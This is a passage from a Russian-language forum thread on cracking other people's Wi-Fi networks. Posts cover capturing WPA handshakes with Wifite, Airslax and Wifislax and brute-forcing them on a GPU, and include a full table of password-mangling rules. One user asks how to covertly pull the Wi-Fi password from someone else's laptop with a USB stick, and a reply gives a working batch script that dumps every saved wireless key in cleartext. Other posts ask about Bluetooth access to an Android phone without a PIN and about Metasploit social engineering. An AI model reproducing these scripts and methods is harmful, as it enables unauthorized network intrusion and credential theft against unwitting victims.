У меня не хватает хендшейк Wifite. Ни разу. А вот Airslax схватил, но только десять штук в один файл запихал, а по отдельности не хочет. Что сделать, чтоб всё работало по-человечески? Или это всё из-за сетевухи?(Думаю тут дело не в руках и не в голове) И как после того как всё правильно заработает, перехватывать хендшейки автоматически, группами(примерно по 10, в разных файлах)?
Подскажите пожалуйста, можно ли как то подключиться к андроид устройству по bluetooth без ввода пароля?
Хенды вроде бы всегда кладутся в один файл еслм пользоваться скриптами автоматами, сам их не проверял так как все ручками делаю, проще и эффективно!!! А что вырезать Хенды из файла не судьба, тем же aircrack-ng
Я уже понял, что на автомате в один файлик и по размеру они 100(или меньше) кб, когда одиночные могут достигать одного мб. У меня просто не получается ловить одиночные. А как взломать автоматический в кали? То есть словил а файлик в 30 хендшейков в аирслаксе, а хочу пропустить по базе паролей не на цпу(1000 пар\с примерно), а на oclhashcat с помощью гпу(может быстрее даст), в аирслаксе нельзя тк его надо купить.
Подскажите пожалуйста как подключиться к скрытой сети в wifislax 4.10.1 ? раньше был wicd но теперь его нигде не могу найти, если ли еще способы?
usb-адаптер awus036h на Убунте (в принципе под другими дистрибутивами) нормально не работает в сёрфинге пока из терминала не дашь команду iwconfig wlx00c0ca72594b rate 5.5M fixed. Может кто-нибудь подскажет как можно автоматизировать всё это дело, чтобы каждый раз при перезагрузке не лезть в консоль?
Просьба проверить хендшейк, не пойму может он пустой или неправильный, или подскажите как самому понять. У меня там через варшарк показывает всего 2, Mesage 1 - 4 и Mesage 2 - 4, этого хватит чтобы сбрутить пароль? http://rghost.ru/7cR97P6Kr
Где можно ознакомится с созданиям правил для брута и узнать, что они из себя представляют ? Не могу найти на форуме
Spoiler: Изучай : Ничего не делать с исходным словом l Перевести в нижний регистр u Перевести в верхний регистр c Перевести первый символ в верхний регистр,остальные - в нижний C Перевести первый символ в нижний регистр,остальные - в верхний t Инвертировать регистр всех символов в слове TN Инвертировать регистр символа в позиции N Примечание: N = 0...9 для позиции от 0 до 9,N = A...Z для позиции от 10 до 35 r Обратить: "Fred" -> "derF" d Дублировать: "Fred" -> "FredFred" f Отразить: "Fred" -> "FredderF" { Сдвинуть слово влево на 1 символ: "jsmith" -> "smithj" } Сдвинуть слово вправо на 1 символ: "smithj" -> "jsmith" $X Добавить в конце слова символ X ^X Добавить в начале слова символ X [ Удалить первый символ в слове ] Удалить последний символ в слове DN Удалить символ в позиции N xNM Извлечь подстроку от позиции N до количества символов M Примечание: M = 1...9 для кол-ва символов от 1 до 9,M = A...Z для кол-ва символов от 10 до 35 iNX Вставить символ X в позиции N и сдвинуть вправо остальное oNX Заменить символ в позиции N на символ X <N Отклонить слово, если его длина не меньше N символов >N Отклонить слово, если его длина не больше N символов 'N Обрезать слово до длины N символов sXY Заменить все символы X на символы Y @X Удалить все символы X из слова !X Отклонить слово, если оно содержит символ X /X Отклонить слово, если оно не содержит символ X =NX Отклонить слово, если оно не содержит символ X в позиции N (X Отклонить слово, если его первый символ не X )X Отклонить слово, если его последний символ не X %MX Отклонить слово, если оно не содержит по меньшей мере M включений символа X aN Проверить слово со всеми возможными регистрами символов, N - Максимальная длина паролей, к которым применять данное правило. Примечание: данное правило нельзя использовать в одной строке с другими правилами! pN Копировать слово N раз Примечание: N = 3...9 v1.8: zN Дублировать первый символ пароля N раз Примечание: N = 1...9 ZN Дублировать последний символ пароля N раз Примечание: N = 1...9 q Дублировать все символы пароля: "admin" -> "aaddmmiinn" 3. Допускается использовать в одной строке несколько правил, применяемых к одному входному слову.При этом обработка правил идет слева направо. К примеру, если применить правило "l$1$9$8$0d" к слову "JOHN", то результат будет таким - "john1980john1980".
Есть вопрос: имеется физический доступ к чужому ноутбуку на котором вайфай. Есть ли какая-нибудь программка которую можно записать на флешку, подключить её к ПК и она сама тихо-скрытно сохранит искомый пароль?
Варианты: 1. Router Scan в тихом режиме 2. NirSoft WirelessKeyView - начиная с Vista, умеет экспортировать в CSV 3. wifidump.cmd : Code: @echo off :: WLAN profile dumper by binarymaster :: Requires Windows 7 or higher + administrator rights :: Tested only with Windows 7 setlocal enabledelayedexpansion chcp 10000 > nul cd %~dp0 netsh wlan show profile | find " : " > wlan.txt for /F "tokens=2,2* delims=:" %%A in (wlan.txt) do ( set ln=%%A set ln=!ln:~1! netsh wlan show profile key=clear "!ln!" >> pasw.txt ) del wlan.txt
Как поймать хендшейк именно с четырьмя EAPOL пакетами, Mesage 1 - 4, 2 -4, 3 - 4 и 4 - 4. Сколько ни ловлю хендшейков, там только 1 - 4 и 2 - 4. Ловлю с wifislax на вмварьке хендшейкером или гойскриптом, короче хендшейки не брутятся, хотя гугл пишет что пароль именно в этих двух первых пакетах, но предпочтительно иметь полноценный хендшейк со всеми четырьмя пакетами.
Handshacker 4 пакета ловит в вифислакс только в версии 4.10.Goyscript как ни крути всегда ловит только 2 пакета.Мой совет в вифислакс пользоваться minidwep-почти постоянно 4 пакета и брутятся хорошо.И чтоб поймать полноценный хендшейк нужно иметь хороший сигнал до точки доступа и от точки доступа до клиента.Удачи!Не получается поймать в вифислакс пробуй в kali linux.Я думаю что можно записать на dvd или флэшку kali linux и попробовать поймать то что нужно
Хэндшейки нужно проверять самому.Скрипты часто ловят их кривыми.Вот они и не брутятся. Проверить можно хотябы так: pyrit -r xxx.cap analyze Вывод должен быть примерно таким: #1: Station 9c:80:df:37:b8:fc, 11 handshake(s): #1: HMAC_SHA1_AES, good, spread 9 #2: HMAC_SHA1_AES, workable, spread 15 #6: HMAC_SHA1_AES, bad, spread 6 Ну или в Wireshark можно.Но тут нужны хоть малмальские знания.Более подробней об этом ищи в ветках.Инфа 100% есть.Наличие EAPOL пакетов,вовсе не гарантирует их полноту и целостность.Временные интервалы между ними должны быть не более 1 секунды. Да,желательно иметь все 4 пакета.Но вовсе не обязательно.
интересно УЗНАТЬ кто-нибудь реализовал уязвимость hole 196.Если у кого получилось отпишитесь пожалуйста в этой ветке.У меня одна точка с хорошим сигналом без клиентов уже висит один год и как к ней подключится ума не приложу.Советовали с помощью соц.инженерии-metasploita и meterpretera но я пока не пробовал пробится на комп